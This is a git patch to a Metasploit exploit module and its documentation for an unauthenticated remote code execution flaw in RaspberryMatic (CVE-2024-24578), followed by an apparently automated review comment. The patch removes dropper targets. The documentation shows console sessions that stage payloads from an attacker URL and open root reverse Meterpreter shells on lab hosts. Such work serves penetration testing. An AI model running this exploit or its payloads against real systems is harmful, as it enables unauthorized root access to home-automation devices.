From d3e41f583cfbeadfd93b59153d49905937be8d94 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Mon, 3 Feb 2025 17:54:45 +0000 Subject: [PATCH] removed linux dropper code and tested with PR 19850 --- ...aspberrymatic_unauth_rce_cve_2024_24578.md | 47 ++++--------------- ...aspberrymatic_unauth_rce_cve_2024_24578.rb | 30 +----------- 2 files changed, 9 insertions(+), 68 deletions(-) diff --git a/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md b/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md index f12ae5b04d7a..4ee4d7e985b3 100644 --- a/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md +++ b/documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md @@ -35,7 +35,7 @@ You are now ready to test the module. - [ ] `set rhosts ` - [ ] `set rport ` - [ ] `set lhost ` -- [ ] `set target <0=Unix/Linux Command, 1=Linux Dropper (ARM), 2=Linux Dropper (x86_64)>` +- [ ] `set target <0=Unix/Linux Command>` - [ ] `exploit` - [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings @@ -43,7 +43,7 @@ You are now ready to test the module. No specific options defined. ## Scenarios -### RaspberryMatic OVA appliance - Unix/Linux Command target +### RaspberryMatic OVA appliance - Unix/Linux Command x64 target ```msf msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6 rhosts => 192.168.201.6 
@@ -76,10 +76,10 @@ meterpreter > pwd /root meterpreter > ``` -### RaspberryMatic Pi4 Model B compute board - Linux Dropper (ARM) Command target +### RaspberryMatic Pi4 Model B compute board - Unix/Linux Command aarch64 target ```msf -msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 1 -target => 1 +msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set payload cmd/linux/http/aarch64/meterpreter_reverse_tcp +payload => cmd/linux/http/aarch64/meterpreter_reverse_tcp msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.10 rhosts => 192.168.201.10 msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit @@ -88,17 +88,11 @@ msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit [*] Running automatic check ("set AutoCheck false" to disable) [*] Checking if 192.168.201.10:443 can be exploited. [+] The target appears to be vulnerable. RaspberryMatic 3.65.8 -[*] Executing Linux Dropper (ARM support) for linux/aarch64/meterpreter_reverse_tcp -[*] Using URL: http://192.168.201.8:8080/4h2lPduH4 -[*] Uploading Aarv1CEc.tgz +[*] Executing Unix/Linux Command for cmd/linux/http/aarch64/meterpreter_reverse_tcp +[*] Uploading 8emVtVt6U.tgz [*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE. -[*] Command Stager progress - 100.00% done (115/115 bytes) -[*] Client 192.168.201.10 (Wget/1.21.3) requested /4h2lPduH4 -[*] Sending payload to 192.168.201.10 (Wget/1.21.3) [*] Restoring original watchdog script. -[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:34866) at 2025-01-28 18:10:01 +0000 -[*] Server stopped. - +[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:40324) at 2025-02-03 17:40:01 +0000 meterpreter > sysinfo Computer : 192.168.201.10 OS : (Linux 5.15.56) 
@@ -109,31 +103,6 @@ meterpreter > getuid Server username: root meterpreter > pwd /root -meterpreter > -``` -### RaspberryMatic OVA appliance - Linux Dropper (x86_64) Command target -```msf -msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 2 -target => 2 -msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6 -rhosts => 192.168.201.6 -msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit -[*] Reloading module... -[*] Started reverse TCP handler on 192.168.201.8:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[*] Checking if 192.168.201.6:443 can be exploited. -[+] The target appears to be vulnerable. RaspberryMatic 3.73.9 -[*] Executing Linux Dropper (x86_64 support) for linux/x64/meterpreter_reverse_tcp -[*] Using URL: http://192.168.201.8:8080/8OlmzeRoa -[*] Uploading kovy0xZ9M.tgz -[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE. -[*] Command Stager progress - 100.00% done (115/115 bytes) -[*] Client 192.168.201.6 (Wget/1.21.4) requested /8OlmzeRoa -[*] Sending payload to 192.168.201.6 (Wget/1.21.4) -[*] Restoring original watchdog script. -[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.6:55920) at 2025-01-30 22:25:02 +0000 -[*] Server stopped. - meterpreter > ``` ## Limitations diff --git a/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb b/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb index fe7a4434f692..7e0543d15d00 100644 --- a/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb +++ b/modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb @@ -7,8 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager - include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) 
@@ -43,7 +41,7 @@ def initialize(info = {}) ], 'DisclosureDate' => '2024-03-16', 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE], + 'Arch' => [ARCH_CMD], 'Privileged' => true, 'Targets' => [ [ @@ -53,30 +51,6 @@ def initialize(info = {}) 'Arch' => [ARCH_CMD], 'Type' => :unix_cmd } - ], - [ - 'Linux Dropper (ARM support)', - { - 'Platform' => ['linux'], - 'Arch' => [ARCH_AARCH64, ARCH_ARMLE], - 'Type' => :linux_dropper, - 'CmdStagerFlavor' => ['wget', 'curl'], - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/aarch64/meterpreter_reverse_tcp' - } - } - ], - [ - 'Linux Dropper (x86_64 support)', - { - 'Platform' => ['linux'], - 'Arch' => [ARCH_X64], - 'Type' => :linux_dropper, - 'CmdStagerFlavor' => ['wget', 'curl'], - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' - } - } ] ], 'DefaultTarget' => 0, @@ -191,8 +165,6 @@ def exploit case target['Type'] when :unix_cmd execute_command(payload.encoded) - when :linux_dropper - execute_cmdstager end end end
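Review bot: With `'Arch' => [ARCH_CMD]` now set at module level in this hunk, the single surviving target still repeats `'Arch' => [ARCH_CMD]` and `'Type' => :unix_cmd` (visible as context in the next hunk). The `case target['Type']` in `exploit` (last hunk) is likewise left with one `when :unix_cmd` branch and no `else`. Either call `execute_command(payload.encoded)` directly, or keep the `case` and add `else fail_with(Failure::BadConfig, 'Unsupported target type')` so an unexpected type does not fall through silently. A short comment above the `'Arch'` line would also help the next maintainer, e.g. `# Architecture is chosen through the cmd/linux/http/<arch>/... payload, not through a target`, which matches the aarch64 scenario in the updated documentation. Both `initialize` and `exploit` extend beyond the lines shown, so confirm nothing outside the hunks still relies on the removed `CmdStager`/`FileDropper` mixins.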